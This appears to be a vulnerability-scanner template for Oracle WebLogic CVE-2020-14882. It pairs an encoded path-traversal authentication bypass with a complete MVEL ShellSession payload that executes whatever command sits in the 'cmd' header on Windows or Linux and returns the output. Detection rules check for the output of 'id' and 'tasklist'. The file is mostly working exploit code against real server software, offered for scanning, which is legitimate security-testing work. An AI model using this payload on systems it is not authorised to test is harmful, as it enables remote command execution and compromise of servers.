id: weblogic-console-rce-cve-2020-14882 info: name: Weblogic RCE GET request — (CVE-2020-14882) risk: Critical params: - root: '{{.BaseURL}}' requests: # really do run a commands here - method: POST redirect: false url: >- {{.root}}//console/images/%252e%252e%252fconsole.portal headers: - Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' - Accept-Language: 'en-US,en;q=0.5' - Accept-Encoding: 'gzip, deflate' - Content-Type: application/x-www-form-urlencoded - cmd: id body: | _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("var+m+%3d+java.lang.Class.forName("weblogic.work.ExecuteThread").getDeclaredMethod("getCurrentWork")%3b+var+currThread+%3d+java.lang.Thread.currentThread()%3b+var+currWork+%3d+m.invoke(currThread)%3b+var+f2+%3d+currWork.getClass().getDeclaredField("connectionHandler")%3b+f2.setAccessible(true)%3b+var+connectionHandler+%3d+f2.get(currWork)%3b+var+f3+%3d+connectionHandler.getClass().getDeclaredField("request")%3b+f3.setAccessible(true)%3b+var+request+%3d+f3.get(connectionHandler)%3b+var+command+%3d+request.getHeader("cmd")%3b+var+response+%3d+request.getResponse()%3b+var+isWin+%3d+java.lang.System.getProperty("os.name").toLowerCase().contains("win")%3b+var+listCmd+%3d+new+java.util.ArrayList()%3b+var+p+%3d+new+java.lang.ProcessBuilder("")%3b+if(isWin){p.command("cmd.exe",+"/c",+command)%3b+}else{p.command("/bin/bash",+"-c",+command)%3b+}+p.redirectErrorStream(true)%3b+var+process+%3d+p.start()%3b+var+output+%3d+process.getInputStream()%3b+var+scanner+%3d+new+java.util.Scanner(output).useDelimiter("\\\\A")%3b+var+out+%3d+scanner.next()%3b+var+outputStream+%3d+response.getServletOutputStream()%3b+outputStream.write(out.getBytes())%3b+outputStream.flush()%3b+response.getWriter().write("")%3b+currThread.interrupt()%3b") detections: - >- StatusCode() == 200 && StringSearch("response", "uid=") && StringSearch("resHeaders", "ADMINCONSOLESESSION") - method: POST redirect: false url: >- {{.root}}//console/images/%252e%252e%252fconsole.portal headers: - Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' - Accept-Language: 'en-US,en;q=0.5' - Accept-Encoding: 'gzip, deflate' - Content-Type: application/x-www-form-urlencoded - cmd: tasklist body: | _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("var+m+%3d+java.lang.Class.forName("weblogic.work.ExecuteThread").getDeclaredMethod("getCurrentWork")%3b+var+currThread+%3d+java.lang.Thread.currentThread()%3b+var+currWork+%3d+m.invoke(currThread)%3b+var+f2+%3d+currWork.getClass().getDeclaredField("connectionHandler")%3b+f2.setAccessible(true)%3b+var+connectionHandler+%3d+f2.get(currWork)%3b+var+f3+%3d+connectionHandler.getClass().getDeclaredField("request")%3b+f3.setAccessible(true)%3b+var+request+%3d+f3.get(connectionHandler)%3b+var+command+%3d+request.getHeader("cmd")%3b+var+response+%3d+request.getResponse()%3b+var+isWin+%3d+java.lang.System.getProperty("os.name").toLowerCase().contains("win")%3b+var+listCmd+%3d+new+java.util.ArrayList()%3b+var+p+%3d+new+java.lang.ProcessBuilder("")%3b+if(isWin){p.command("cmd.exe",+"/c",+command)%3b+}else{p.command("/bin/bash",+"-c",+command)%3b+}+p.redirectErrorStream(true)%3b+var+process+%3d+p.start()%3b+var+output+%3d+process.getInputStream()%3b+var+scanner+%3d+new+java.util.Scanner(output).useDelimiter("\\\\A")%3b+var+out+%3d+scanner.next()%3b+var+outputStream+%3d+response.getServletOutputStream()%3b+outputStream.write(out.getBytes())%3b+outputStream.flush()%3b+response.getWriter().write("")%3b+currThread.interrupt()%3b") detections: - >- StatusCode() == 200 && StringSearch("body", "Session") && StringSearch("body", "PID") && StringSearch("resHeaders", "ADMINCONSOLESESSION") reference: - link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf